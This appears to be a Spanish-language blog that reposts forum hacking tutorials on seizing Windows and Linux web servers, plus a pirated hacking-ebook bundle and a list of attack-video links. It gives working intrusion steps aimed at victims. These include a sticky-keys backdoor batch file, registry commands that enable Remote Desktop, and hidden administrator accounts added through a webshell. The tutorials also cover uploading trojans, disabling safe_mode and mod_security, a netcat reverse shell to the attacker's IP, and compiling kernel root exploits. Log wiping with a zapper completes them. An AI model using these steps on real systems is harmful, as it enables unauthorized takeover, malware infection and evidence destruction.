Abriremos nuestra consola y haremos un ping a la web, de forma que nos devuelva la Ip del servidor en el que se aloja y hemos backdoorizado.

Citar
ping www.pagina.com
Haciendo ping a www.pagina.com [123.123.123.123] con 32 bytes de datos:

Respuesta desde 123.123.123.123: bytes=32 tiempo=71ms TTL=246
Respuesta desde 123.123.123.123: bytes=32 tiempo=56ms TTL=246
Respuesta desde 123.123.123.123: bytes=32 tiempo=62ms TTL=246
Respuesta desde 123.123.123.123: bytes=32 tiempo=62ms TTL=246

Estadísticas de ping para 123.123.123.123:
Paquetes: enviados = 4, recibidos = 4, perdidos = 0
(0% perdidos),
Tiempos aproximados de ida y vuelta en milisegundos:
Mínimo = 56ms, Máximo = 71ms, Media = 62ms
Eso en Win, en Linux es igual.
Bueno, a nosotros nos interesa la parte roja, que es la Ip del servidor en el que se aloja la Web.
Esa es la Ip que debemos introducir en el cliente de escritorio remoto.
En Windows con el cliente abierto:
Código: [Seleccionar]
Equipo:  [123.123.123.123]
[Conectar]
Simplemente le damos a conectar.
En Linux abrimos una terminal e introducimos:
Código: [Seleccionar]
rdesktop 123.123.123.123

Bueno, si el señor fué bueno y nos abrio el puerto en el Router, deberiamos estar en el Logon de Windows, donde nos pide un usuario y una password.
Aunque no la sepamos, como habíamos Backdoorizado con el .bat de 3D1, al presionar 5 veces la tecla shift:

Se nos abrirá una consola situada en la raíz del systema, osease, system32...
Povale, que bien XD.

¿Pero donde está el SYSTEM?
Bueno, si quereis enteraros de como funciona la cosa clickead aquí, si quereis ahorrar el paso de leerlo haced lo siguiente:

Situados en la Consola que se abrio en el Logon del servidor, teclead explorer.exe, y bueno, lo que pasa en windows es que al haber abierto una Consola sin que haya sido abierta desde el menu ejecutar, herramientas en el inicio, o desde la carpeta system32, se abrira con el nombre de svchost.exe, y al ejecutar el proceso explorer, se abrirá el escritorio y nuestro usuario será SYSTEM, que viene a ser algo así como el root de Windows, ojo, que no es un root como el de Linux o Unix, es un root oculto que en principio no se debería saber de él ( Shocked somos kakers que nos saltamos la ley Shocked)

Bueo, a la cosa, ejecutamos explorer.exe y se nos abrira el escritorio...
Pulsamos el boton de la tecla inicio, miramos el usuario...
¡SYSTEM!
¡Somos root en windows sin necesidad de root exploits!
Ya podeis si quereis cerrar la consola, teclear Alt Ctrl Supr y en la pestaña procesos cerrar winlogon.exe, que sino se nos quedará de fondo de pantalla lo de meter el usuario y password Tongue

5 - Terminal Server sin usuario SYSTEM


¿Qué quiere decir esto?
Pues que para realizar esta conexión, no vamos a sustituir sethc.exe por cmd.exe, sino que vamos a hacer una conexión normal.
Para esto, se debe de crear un bat que habilite Terminal Server (Escritorio Remoto de Windows) de la siguiente manera:
Código: [Seleccionar]
reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnect ions /f
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnect ions /t "REG_DWORD" /d 0
Sacado del tuto de 3D1.
Borra la clave del registro que bloquea las conexiones entranter de Terminal Server y crea una clave que las acepta.
Eso lo guardamos como escritorio.bat.
Entonces hacemos mano de nuestra WebShell, subimos el bat y hacemos lo siguiente:
Código: [Seleccionar]
rutadelbat\escritorio.bat

Es decir, si lo hemos subido en C: :
Código: [Seleccionar]
C:\escritorio.bat

Bueno, con eso se supone que el servidor de termial server está activo en el servidor remoto.
Ahora tenemos que crear un usuario con derechos de administador para poder conectarnos.
Vamos a la entrada de comandos de la WebShell y escribimos:
Código: [Seleccionar]
Net User Nombre Contraseña /add

Por ejemplo, si de nombre le queremos poner messerschmitt y de contraseña 123456:
Código: [Seleccionar]
Net User messerschmitt 123456 /add

Vale, ya hemos creado un usuario, pero todavía no tiene privilegios de administrador, para dárselos, hacemos lo siguiente:
Código: [Seleccionar]
Net Localgroup Administrators Nombre /add

Si el usuario que hemos creado es messerschmitt:
Código: [Seleccionar]
Net Localgroup Administrators messerschmitt /add

Bueno, como ya tenemos el Terminal Server activo y corriendo, y un usuario con privilegios de adminstrador, solo queda conectarnos vía Escritorio Remoto, poner de nombre messerschmitt y contraseña 123456, y boilá, tenemos el servidor en nuestras manos Cheesy

6 - Troyanizando


Bueno, esta parte es la más fácil y lammer con menos mérito.
Simplemente hay que hacer mano de la WebShell, subir nuestro troyano, y ejecutarlo mediante la entrada de comandos:
Código: [Seleccionar]
rutadeltroyano\server.exe

Es decir, si lo hemos subido a C: :
Código: [Seleccionar]
C:\server.exe

Y boilá, hemos infectado un servidor remoto sin necesidad de tratar con el dueño por msn Grin
Aunque personalmente prefiero todo el método de backdoorizar y acceder como SYSTEM, que aunque sea más largo y tedioso es la verdadera forma de hacer las cosas bien, enterandote de cómo son Smiley


Un saludo Wink

FUENTE:http://argeniverso.66ghz.com/index.php?

Aprovechen al maximo la libertad de informacion pero siempre con la etica que se merece.

saludos roboticos

1/2 - Rootear servidores Linux

1 comentarios
este tal vez sea uno de los temas principales para la seguridad web y porque no..para los desfacers.

Les recuerdo que la informacion es para aprovecharla al maximo osea aprender , practicar , profundizar y generar nuevas cosas mas no para andar dañando paginas por internet...pero bueno cada uno con sus gustos.

Les recuerdo que lo encontre via argeniverso , me parese que es una gran comunidad.
--------------------------------------------------------------------------------------------------

Rooteando Servidores Linux


Buenas noches Grin
Pprimera parte de lo que son dos tutoriales enfocados al rooteo de servidor Linux y Windows.
En la primera entrega se tratarán temas relacionados con el Rooteo de servidores Linux.
Antes de todo, este tuto no explica como alojar, montar, o subir una shell a una web, para eso están las FAQ de Vulnerabilidades y Exploits, cuando tengamos una shell montada hay muchos factores que nos impediran poder sacarle partido, ejemplo de estar con un usuario sin ningun tipo de privilegio, por lo menos debemos tener de Lectura, Escritura, y Ejecucion para poder conseguir rootear adecuadamente.


1 - ¿Que es el Rooteo?
2 - ¿Que son las WebShells?
3 - Permisos.
4 - Directiva PHP: safe_mode y forma de aludirla.
5 - Consiguiendo una Shell Inversa.
6 - Kernel Attack.
7 - Borrando logs: zapper en perl.


1 - ¿Que es el Rooteo?


Bien, el Rooteo proviene de la palabra Root, que en ámbitos Linux o Unix se refiere a un Super Usuario el cual posee y ejerce todos los poderes sobre un sistema, tiene permisos de lectura, escritura, ejecución... bajo cualquier circunstancia, de lo que se deduce:
Rooteo = Administrar un sistema con todo privilegio.
El rooteo se realiza mediante el uso de una WebShell (explicado lo que es más abajo), ya haya sido alojada mediante SQLi, RFI, LFI, Xss, hasta un Ataque Flash

2 - ¿Que es una WebShell?


Como su nombre nos indica, Web (de página web) y Shell (línea de comando), es una línea de comando alojada sobre una web que permite ejecutar código (comandos de toda la vida, rm, ls, ping, etc [en linux]) sobre el servidor en el que está alojada.
Están programadas en PHP, gracias a esa funcion de PHP permiten ejecutar código sobre el servidor.
Existen muchas y muy conocidas, C99, R57, Locus, Ajax, N3tSh3ll, en fin, una infinidad, a la hora de trabajar con ellas son muy intuitivas, es como manejarse en un WebFtp pero con más "pecaminosas funciones" :fuma:

3 - Permisos


Cuando estamos en una WebShell, a la derecha de cada archivo vemos unas letras de este tipo, drwx-r-x

r - Lectura
x - Ejecución
d - Directorio
w - Escritura
- - No hay permiso


4 - Directiva PHP: safe_mode y forma de aludirla


Bien, este punto es muy importante cuando manejamos una WebShell, ya que es la directiva que nos va a dejar trabajar tranquilos, comprueba muchas cosas por razones de seguirdad, las cuales podeis saber que hacen aquí... Esta funcion viene deshabilitada por defecto, pero si os encontrais con ella activada haced lo siguiente:
La forma de aludirlo es subir al mismo path donde se encuentra nuestra WebShell un archivo de configuracion de directivas php, de nombre php y extensión .ini, es decir php.ini.
El código del .ini en cuestión es este:
Código: [Seleccionar]
register_globals = On
engine = On
safe_mode = Off
safe_mode_exec_dir = On
Safe_mode_include_dir = On
Bien, ya hemos mandado a paseo al safe_mode Smiley


Otra cosa, cuando esteis sobre un servidor que sea Apache (lo más normal es que si), tambien necesitareis aludir el mod_security que no se muy bien por qué todavía, cuando esta funcionando no me deja trabajar bien Undecided
En este caso, debemos buscar por todo el directorio de apache o de la web, un fichero que se llame .htaccess.
.htaccess (Acceso de Hiper-Texto) es el nombre por defecto del archivo de configuración de directorios de Apache. Provee de la habilidad para personalizar la configuración de las directivas definidas en el archivo de configuración principal. Las directivas de configuración necesitan estar en el contexto de .htaccess y el usuario necesita los permisos apropiados. Fuente
Bueno, en la WebShell haceis click, y dentro de el añadis (sin borrar nada) estas lineas de codigo (sin borrar nada XD):
Código: [Seleccionar]

SecFilterEngine OFF
SecFilterScanPort OFF
SecFilterCheckURLEncoding OFF
SecFilterCheckUnicodeEncoding OFF

5 - Consiguiendo una Shell Inversa


Bueno, esto de conseguir la Shell es opcional, pero es más comodo manejar la shell remota desde la nuestra.
Para eso nos haremos mano de NetCat Smiley

Shell Inversa


Aquí es donde entran en juego los BackDoors normalmente codeados en Perl.
En este mismo foro hay uno del FoS Team, BackDoor (Recomiendo leer bien el code s))
Bueno, su uso no es complicado, en el code como se puede ver tenemos dos if, depende de cual se declare al usar el BackDoor ejecutará /bin/sh (shell de linux) o cmd (shell de Windows) hacia el NetCat que esté a la escucha.
¿Que lio, verdad? Undecided
No es para tanto, lo que hace ese BackDoor, es enviar una Shell ya bien sea de Linux o Windows hacia la Ip y Puerto que le hayamos especificado, hace lo mismo que si ejecutasemos nc -d -e /bin/sh TuIp Puerto, pero la pega esque a veces NetCat no viene instalado en ese tipo de sistemas, pero si perl Grin

¿Como usarlo?
Pregunta de oro.
Es fácil, nosotros, al ser una shell inversa debemos abrir nuestra shell y colocar:
Código: [Seleccionar]
nc -v -L -p 80

Eso en nuestra shell, la que tenemos en Inicio, Ejecutar en el caso de Windows, y Aplicaciones, Accesorios en caso de Linux.
Guay, nosotros ya estamos escuchando con NetCat conexiones entrantes, ahora con el code previamente proporcionado (el del BackDoor BackFos) abrimos un editor de texto cualquiera y lo llamamos como queramos .pl, por ejemplo backfos.pl, lo subimos con la WebShell al directorio /tmp de Linux y lo ejecutamos como bien pone en el código.
Vuelvo a decir que recomiendo leer detenidamente el codigo del backdoor, por si acaso s)

Si todo sale bien deberiamos recibir la shell donde teniamos a NetCat escuchando.
Por ahora vamos bien, tenemos la Shell de un servidor Linux.
Peeeeeeeeeeeeeeeeeeero, no somos root, por lo cual estamos muy limitados, tenemos solo control parcial sobre el servidor.
Para remediar eso, debemos hacer lo que se denomina un Kernel Attack.

Kernel Attack


¿Qué es el Kernel?


Kernel es el Núcleo de un SO, es la parte más interna de un SO, la que permite hacer funcionar el HardWare, SoftWare, cargar Drivers, en Fin, lo fundamental para que una máquina funcione.
Una imagen vale más que mil palabras XD

Bueno, si sabemos que es el Kernel, sabremos que Kernel Attack es algo que ataca al Kernel para poder sacar beneficios.
Eso se realiza mediante Root Exploits, son exploits locales, es decir, que se los cambios se realizan donde fue ejecutado, no remotamente, normalmente programados en C que aprovechan una grave vulnerabilidad del Kernel que use un Sistema Operativo para conseguir dejarnos acceso como root.
Existe un exploit para casi todos los Kernel de Linux.
Para saber que Kernel (no SO) corre un Sistema Operativo Linux, deberemos cojer la shell que hemos recibido cuando escuchabamos y ejecutar lo siguiente:
Código: [Seleccionar]
uname -r
De lo que nos devolvería esto:
Código: [Seleccionar]
Linux hostname 2.6.24-19-server #1 SMP Sat Jul 12 00:40:01 UTC 2008 i686 GNU/Linux
Bien, examinemos lo que nos dijo:
Linux Hostname - Nombre del Servidor
2.6.24-19 - Versión de Kernel, eso es lo que nos Interesa.
Bien, ahora deberemos hacer mano de Google, e introducir una búsqueda tal que así:
2.6.24 kernel root exploit.
Bueno, cuando tengamos el Exploit, abriremos un editor de texto, pegaremos el code del Root Exploit, y lo guardaremos como lo que sea .c, ejemplo, root.c.
Bien, ahora tenemos que buscar en la WebShell un directorio donde tengamos permisos de ejecucion de archivos.
Leyendo por Internet ví que en /tmp normalmente hay permisos de ejecucion, lectura, escritura y todo eso, así que debemos de introducir:
Código: [Seleccionar]
cd /tmp
De forma que nos situemos en el directorio tmp de Linux.
Ahora agarramos la WebShell y en las opciones de abajo nos dirigimos a /tmp.
Aí dentro subimos nuestro root.c.
Volvemos a la otra shell y como ya estabamos situados en /tmp introducimos:
Código: [Seleccionar]
ls
Ahora nos debe mostrar todo lo que hay en ese directorio, debemos buscar root.c y hacer lo siguiente:
Introducimos todo en este orden:
Código: [Seleccionar]
gcc root.c -o rootexploit
Compilamos el code.

Código: [Seleccionar]
id
De lo que nos debe devolver uid=numeros(nombre), esa es la Id que teneis ahora, que no es root.

Código: [Seleccionar]
chmod -c 777 rootexploit
Damos permisos 777, lectura, escritura, ejecucion, etc, para que pueda realizar su cometido.
De lo que devolverá mode of 'rootexploit' changed to 0777 (rwxrwxrwx).

Código: [Seleccionar]
./rootexploit
Cuando haya terminado:

Código: [Seleccionar]
id
Si nos devuelve uid=0(root)...
¡Hemos Rooteado el servidor!
¡Lo estamos administrando!
¡Podemos incluso apagarlo!

7 - Borrando logs: zapper en perl


Como ahora ya tenemos permisos de escritura, lectura, ejecucion (root), podemos borrar los logs que quedaron estén en el directorio en el que estén, mediante este Zapper en Perl, Zapper.
Como ya sabemos, perl zapper.pl.

Saludos argeniverso! Cheesy

FUENTE:http://argeniverso.66ghz.com/index.php

saludos roboticos

Libros de Hacker Importantes(argeniverso.66ghz)

0 comentarios

Datos Técnicos
Colección de Libros sobre Hacking
PDF | CHM | Ingles | 550 Mb

Descripción

El hacking o jaqueo se basa en el arte informático de construir y solucionar problemas que atenten contra la vulnerabilidad de un sistema o aplicación, compartiendo este mismo método con otros hackers y al contrario de lo que erróneamente suele afirmarse no es la técnica de ejecutar una aplicación para robar contraseñas y romper un sistema a través de malware, spyware o un ping, estas acciones las hacen los lamers, y en menor medida, cuando se ha hecho un ataque prolijo sabiendo lo que se hace es realizado por crackers.

En resumen, el hacking es la técnica o arte de encontrar los límites de los productos, aparatos y servicios digitales de informática o comunicaciones y compartirlo con otros y/o los fabricantes mismos de ésos productos.

Colección

* (Ebook - Computer) Hacking The Windows Registry.pdf
* (eBook - PDF) Hugo Cornwall - The Hacker's Handbook .pdf
* (eBook pdf) Hacking into computer systems - a beginners guide.pdf
* (ebook - pdf) Hacking IIS Servers.pdf
* A Beginners Guide To Hacking Computer Systems.pdf
* amazon-hacks.chm
* Attacking the DNS Protocol.pdf
* Auerbach Practical Hacking Techniques and Countermeasures Nov 2006.pdf
* bsd-hacks.pdf
* Certified Ethical Hacker (CEH) v3.0 Official Course.pdf
* Computer - Hackers Secrets - e-book.pdf
* cracking-sql-passwords.pdf
* Crc Press - The Hacker'S Handbook.pdf
* Credit Card Visa Hack Ucam Cl Tr 560.pdf
* DangerousGoogle-SearchingForSecrets.pdf
* database hacker handbook.chm
* Dummies - Hack How To Create Keygens.pdf
* ebay hacks 100 industrial strength tips and tools.pdf
* eBooks OReilly - Wireless Hacks 100 Industrial - Strength Tips and Tools.chm
* ethical hacking, student guide.pdf
* excel hacks.chm
* google hacks.pdf
* Guide to Hacking with sub7.doc
* Hack IT Security Through Penetration Testing.pdf
* Hack Proofing - Your Network - Internet Tradecraft.pdf
* Hack Proofing Linux A Guide to Open Source Security - Stangler, Lane - Syngress.pdf
* Hack Proofing Sun Solaris 8.pdf
* Hack Proofing Your E-Commerce Site.pdf
* Hack Proofing Your Identity In The Information Age.pdf
* Hack Proofing Your Network Second Edition.pdf
* Hack Proofing Your Network First Edition.pdf
* Hack Proofing Your Web Applications.pdf
* Hacker Disassembling Uncovered.chm
* hacker ethic.pdf
* Hacker Linux Uncovered.chm
* Hacker Web Exploitation Uncovered.chm
* Hacker'S.Delight.chm
* Hackers Beware.pdf
* Hackers Secrets Revealed.pdf
* Hackers Secrets.pdf
* Hackers, Heroes Of The Computer Revolution.pdf
* Hackers Secrets.pdf
* Hacker s Guide.pdf
* Hacking - Firewalls And Networks How To Hack Into Remote Computers.pdf
* Hacking - The Art of Exploitation.chm
* Hacking Cisco Routers.pdf
* Hacking Exposed - Network Security Secrets & Solutions, 2nd Edition.pdf
* Hacking Exposed Network Security Secrets & Solutions, Third Edition ch1.pdf
* Hacking For Dummies 1.pdf
* Hacking For Dummies 2.pdf
* Hacking For Dummies.pdf
* Hacking GMail.pdf
* Hacking IIS Servers.pdf
* Hacking into computer systems - a beginners guide.pdf
* hacking the windows registry.pdf
* Hacking Windows XP.pdf
* Hacking-ebook - CIA-Book-of-Dirty-Tricks1.pdf
* Hacking-Hacker's Guide.pdf
* Hacking-Hackers Secrets Revealed.pdf
* Hacking-Hugo Cornwall-The Hacker's Handbook.pdf
* Hacking-The Hacker Crackdown.pdf
* Hacking For Dummies Access To Other People's System Made Simple.pdf
* Hacking.Guide.V3.1.pdf
* Hackproofing Oracle Application Server.pdf
* Hack Attacks Revealed A Complete Reference With Custom Security Hacking Toolkit.
* Hack IT Security Through Penetration Testing.chm
* Halting.The.Hacker.A.Practical.Guide.To.Computer.Security.chm
* How to Crack CD Protections.pdf
* John Wiley & Sons - Hacking For Dummies.pdf
* John Wiley and Sons Hacking Windows XP Jul 2004 eBook-DDU.pdf
* linux-server-hacks.pdf
* little black book computer viruses.pdf
* mac-os-hacks.chm
* McGraw-Hill - Hacking Exposed, 3rd Ed - Hacking Exposed Win2.pdf
* McGraw Hacking Exposed Cisco Networks.chm
* McGraw Hill HackNotes Network Security Portable Reference eB.pdf
* McGraw Hill HackNotes Web Security Portable Reference eBook.pdf
* McGraw Hill HackNotes Windows Security Portable Reference eB.pdf
* Mind Hacks - Tips & Tricks for Using Your Brain.chm
* network-security-hacks.chm
* No Starch Press Hacking The Art Of Exploitation.chm
* O'Reilly - Online Investing Hacks.chm
* O'Reilly - Network Security Hacks.chm
* O'Reilly Windows Server Hack.chm
* O'Reilly Windows Server Hack.rar
* online-investing-hacks.chm
* OReilly Google Hacks, 1st Edition2003.pdf
* OReilly - Google Hacks.pdf
* Oreilly, Paypal Hacks (2004) Ddu.chm
* OReilly, IRC Hacks (2004).DDU.chm
* OReilly SQL Hacks.Nov.2006.chm
* OSB Ethical Hacking and Countermeasures EC Council Exam 312.50 Student Coursewar eBook LiB.chm
* O´Reilly - Windows XP Hacks.chm
* PC Games - How to Crack CD Protection.pdf
* Security and Hacking - Anti-Hacker Tool Kit Second Edition.chm
* SoTayHacker1.0.chm
* spidering-hacks.chm
* SQL Hacks.chm
* SQLInjectionWhitePaper.pdf
* Syngress - Hacking a Terror Network. The Silent Threat of Covert Channels.pdf
* Syngress - Hack Proofing Your Wireless Network.pdf
* Syngress Hack Proofing Your Identity in the Information Age.pdf
* Syngress Buffer Overflow Attacks Dec 2004 eBook-DDU.pdf
* Syngress Hack the Stack Oct 2006.pdf
* The Little Black Book Of Computer Virus.pdf
* The Little Black Book of Computer Viruses.pdf
* tivo-hacks 100 industrial strength tips and tools.pdf
* u23 Wiley - Hacking GPS - 2005 - (By Laxxuss).pdf
* Wiley The Database Hackers Handbook Defending Database Servers.chm
* Win XP Hacks oreilly 2003.chm
* Windows Server Hacks.chm
* WinXP SP1 Hack.pdf
* Xbox hack - AIM 2002 008.pdf
* Yahoo Hacks Oct 2005.chm

http://www.filefactory.com/f/5a1d06bc5aaa6997/


Esta recompilacion la encontre via argeniverso.66ghz aunque faltan muchos libros mas actuales despues la completare :D.

FUENTE:http://argeniverso.66ghz.com/index.php

saludos roboticos

Hackear por Escritorio Remoto de Windows

0 comentarios
este tutorial me parecio algo digamos "novedoso" pero definitivamente es muy rebuscadoy funciona! xD. lo encontre via portal hacker.

--------------------------------------------------------------------------------------------------

Hackear por Escritorio Remoto de Windows
(Empezando todo de nuevo..)

1)Escanear los puertos, para ver si tiene el puerto 3389 (El de escritorio
remoto)abierto, si es que tiene el puerto habilitado seguir el paso 2), si es que el puerto y Escritorio Remoto no esta funcionando el pasar al paso 2.1):

2)Crear un batch que haga los siguiente:
Citar
Código:
echo off
title .
Copy "c:\windows\system32\sethc.exe" "c:\windows\system32\sethc.zzz"
Copy "c:\windows\system32\cmd.exe" "c:\windows\system32\sethc.exe"
del %0
exit
Este batch lo que hace es crearnos un agujero para poder pasar. Setch es el programita que inicia cuando presionamos 5 veses Shift. Tambien es posible utilizar Sethc.exe en el escritorio Remoto de Windows.
Luego de alguna forma mandamos el batch a nuestra victima y cuando lo abra nos abrira el paso
y el batch se autoborrara.

2.1)Si es que no tiene habilitado el "Escritorio Remoto de Windows" creamos
el siguiente Batch para activarlo y crear el agujero que nos dejara pasar.
Citar
Código:
echo off
title .
cls
Copy "c:\windows\system32\sethc.exe" "c:\windows\system32\sethc.zzz"
Copy "c:\windows\system32\cmd.exe" "c:\windows\system32\sethc.exe"
reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnect ions /f
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnect ions /t "REG_DWORD" /d 0
del %0
exit
Y esto se lo enviamos ha la victima de alguna forma y al momento de abrirlo nos habilitara el
"Escritorio Remoto de Windows" y nos abrira el paso y el Batch se AutoBorrara.

3)Luego abrimos Inicio/programas/Accesorios/comunicaciones/ConeXion a escritorio remoto
Presionamos opciones, y rellenamos los datos de la pestaña General de la siguiente forma:
Equipo:1.2.3.4 <- Direcciona IP de la victima
Nombre de Usuario: <-No ponemos nada lo dejamos Vacio
Contraseña: <-Lo dejamos vacio.
Dominio: <-Lo dejamos vacio.


Luego nos pasamos a la pestaña "Recursos locales"
y cambiamos solo la opcion "Teclado", desplegamos la lista y seleccionamos "En el equipo remoto"

4)Luego click en conectar.

5)Cuando nos salga la ventanita pidiendo USER/PASS presionamos 5 veses SHIFT y nos saldra la ventanita de DOS en el equipo remoto y STICKYKEYS en nuestra maquina, el STICKYKEYS de nuestra maquina lo cerramos para que no nos moleste.

6)Ahora tenemos acceso a la raiz osea como SYSTEM (NT AUTHORITY\SYSTEM) teniendo es DOS en la mano, podemos iniciar algunos servicios como ser el telnet, o podemos modificar algunas cosas de su PC. (Esto si quieren, inicien: Compmgmt.msc).

7)Para finalizar debemos borrar el programa que nos dejo pasar, Recuerdan que hize una copia de Sethc.exe a Sethc.zzz ahora tenemos que volver las cosas como estaban.
Citar
Código:
copy "c:\windows\system32\setch.zzz" "c:\windows\system32\setch.exe"
del "c:\windows\system32\setch.zzz"

Microsoft creo "Escritorio Remoto de Windows" para que lo Explotemos
y lo usemos cuando no tengamos un troyano ha mano. (Claro que tambien es una herramienta util..)
Cool
SaluDOS!!! Cool

FUENTE:http://foro.portalhacker.net/index.php/topic,79495.0.html

Vídeos sobre seguridad/inseguridad y hacking

1 comentarios
esta recompilacion la encontre en el foro de elhacker.net muy buena por sierto , tambien hay muchas en distintas web pero con diferentes enfacis , aqui solo hay una pequeña parte asi que disfruten y felices labs.

-----------------------------------------------------------------------------------------------------

1. Basic Socket Programming: (4 videos - 65 mins)

1.1 Presentation on Socket Programming basics (25 mins)
1.2 "Type with Me" exercise - a simple TCP server (19 mins)
1.3 Coding a TCP Echo server (13 mins)
1.4 Coding a TCP Echo client (9 mins)

http://www.security-freak.net/sockets/socket-programming.html


2. Packet Sniffing using Raw Sockets: (7 videos - 86 mins)

2.1 Presentation on raw socket basics (14 mins)
2.2 Sniffer coding basics (15 mins)
2.3 Sniffer - Ethernet header parsing (10 mins)
2.4 Sniffer - IP header parsing (14 mins)
2.5 Sniffer - TCP header parsing (10 mins)
2.6 Sniffer - Data parsing (9 mins)
2.7 A look at Tcpdump and Ethereal (14 mins)

http://www.security-freak.net/raw-sockets/raw-sockets.html


3. Packet Injection using Raw Sockets: (6 videos - 75 mins)

3.1 Packet injection basics presentation (10 mins)
3.2 Your first packet injection program (9 mins)
3.3 Ethernet header contruction & injection (10 mins)
3.4 IP header construction & injection (14 mins)
3.5 TCP header and data contruction & injection (17 mins)
3.6 ARP Request query injector (15 mins)

http://www.security-freak.net/packet-injection/packet-injection.html


4. Architecture of a Proactive Security Tool: (4 videos - 43 mins)

4.1 The "Sniff - Think - Inject" logic - a presentation (10 mins)
4.2 Programming the Framework (7 mins)
4.3 Communication via the Framework (8 mins)
4.4 ARP DoS tool using the Framework (18 mins)

http://www.security-freak.net/architecture/architecture.html


5. Encryption Basics using RC4: (3 videos - 38 mins)

5.1 RC4 basics presentation (13 mins)
5.2 Understanding RC4 via simulations (13 mins)
5.3 File encryption / decryption using RC4 (12 mins)

http://www.security-freak.net/encryption/encryption-rc4.html



Irongeek - Hacking Illustrated

http://www.irongeek.com/i.php?page=security/hackingillustrated



Hackeando Smart Cards de Fedex Kinko’s
http://foro.elhacker.net/index.php/topic,116216.0.html



Hackeando webs de Lineage 2 - video
http://foro.elhacker.net/index.php/topic,154731.0.html



Pocket Bluesnarfer
http://foro.elhacker.net/index.php/topic,109882.0.html



Local JPG shell Inclusion
http://foro.elhacker.net/index.php/topic,158322.0.html


Obteniendo Shell con LFI +[VIDEO]
http://foro.elhacker.net/hacking_basico/obteniendo_shell_con_lfi_video-t217499.0.html


EaryhLink.net Hacked By w32-Gen
http://foro.elhacker.net/index.php/topic,148012.0.html



Videos SHMOOCON 23-25 Marzo 2007
http://www.shmoocon.org/2007/videos/



Ataques a controladores de dispositivos inalambricos
http://foro.elhacker.net/index.php/topic,132675.0.html



http://icaix.com/tutoriales/ARP.htm
http://icaix.com/tutoriales/ettercap.htm
http://icaix.com/tutoriales/arpwatch.htm

Botnets:
http://www.youtube.com/swf/l.swf?swf=http%3A//s.ytimg.com/yt/swf/cps-vfl87070.swf&video_id=BRhauoXpNSs&rel=1&eurl=&iurl=http%3A//i3.ytimg.com/vi/BRhauoXpNSs/hqdefault.jpg&sk=gMf9z_gob8ycD6nHUKObudoDxM_nJtRaC&ap=%26fmt%3D18&cr=US&avg_rating=4.66666666667&length_seconds=129&allow_ratings=1&title=Symantec%20Guide%20to%20Scary%20Internet%20Stuff%20-%20Botnets

De los chicos de Backtrack.fr (en francés)
http://benjy-blog.blogspot.com/

Si quieres meter ataques a teléfonos móviles, te falta el ataque Blueline contra teléfonos Motorola.

Doc: http://gospel.endorasoft.es/bluetooth/seguridad-bluetooth/blueline.html
Video: http://www.youtube.com/watch?v=4bnE5_esbOU

Youtube Hacking Too Easy: Spammers Exploiting
http://www.youtube.com/watch?v=eiW1b7KwvQI

Hacking windows xp passwords TUTORIAL!!!!
http://www.youtube.com/watch?v=qxOCQIQYuHM

Hacking wireless networks with KisMac
http://www.youtube.com/watch?v=G38PD5FyUxE

Hacking WLAN
http://www.youtube.com/watch?v=eKrAZpANoeM

How to Bypass a Windows XP Password Without any Programs
http://www.youtube.com/watch?v=oC8c7zKLnU4

Easy Windows Password Hack
http://www.youtube.com/watch?v=brpBGTyp5Qw

Fake Virus Tutorial
http://www.youtube.com/watch?v=lwSzbnIybeA

Hacking Email & Passwords
http://www.youtube.com/watch?v=j_tMFUqowRQ

Basic Yahoo ID Cracking

http://www.youtube.com/watch?v=Q5vaC0XidNc

Tripod-Lycos distribute Malware
http://www.youtube.com/watch?v=ZsJAfYimpdM

Auditing MD5 Password Hashes: http://www.irongeek.com/i.php?page=videos/md5-password-cracking

Y otra pagina para bajar videos:

http://www.hackerscenter.com/video/

tambien es exelente esta
http://www.milw0rm.com/video/#

mas de 40 videos

un curso completo de ethical hacking y es basado en videos http://foro.elhacker.net/hacking_avanzado/career_academy_hacking_penetration_testing_and_counter_17cd-t169709.0.html

Explotacion de la Vulnerabilidad RPC/DCOM: MS03-026

La sigueinte informacion es publicada con fines educativos y para ilustrar de forma real el impacto que puede tener el no estar al dia con las actualizaciones de Microsoft.

Herramientas necesarias:

* Nmap
* Metasploit 3.1
* TFTP

Como funciona

El Remote Procedure Call (RPC) permite el intercambio de información entre equipos, y está presente por defecto en el protocolo TCP bajo el puerto 135 en Windows NT 4.0, 2000 y XP.

Existe una vulnerabilidad en la parte de RPC encargada del intercambio de mensajes sobre TCP/IP, que ocasiona que uno de ellos incorrectamente creado, permita a un atacante ejecutar cualquier código con los privilegios locales (Mi PC).

Para explotar esta vulnerabilidad un atacante debe establecer una conexión TCP/IP al RPC Endpoint Mapper remoto y enviar un mensaje malformado, que provoque un desbordamiento de búfer en la memoria, pudiendo ejecutar programas, ver o borrar información, o crear nuevas cuentas con todos los privilegios.

SOs que afecta:

* Microsoft Windows NT® 4.0
* Microsoft Windows NT 4.0 Terminal Services Edition
* Microsoft Windows 2000
* Microsoft Windows XP
* Microsoft Windows Server™ 2003

Como se explota

Debemos instalar y verificar que este corriendo nuestro Servidor TFTP.

Utilizamos nmap para realizar un escaneo de los dispositivos conectados a la red. Cualquier equipo con Widows y con el puerto 135 abierto es candidato a se explotado.

Posterior mente realizamos los pasos descritos en el siguiente video.
http://rapidshare.com/files/121542450/LAINV1.rar.html

Contramedidas

Actualizar el sistema operativo con el parche correspondiene y mantener al dia las actualizaciones de nuestros equipos y o bien, contar con un firewall.


NOTA: cabe destacar que la recompilacion es hecha por varios users del foro asi que muchos agradecimientos a ellos , si alguien quiere aportar mas estan habilitadas las respuestas y comentarios.

FUENTE:http://foro.elhacker.net/hacking_avanzado/videos_sobre_seguridadinseguridad_y_hacking-t166107.0.html

saludos roboticos
Powered by Bad Robot
Helped by Blackubay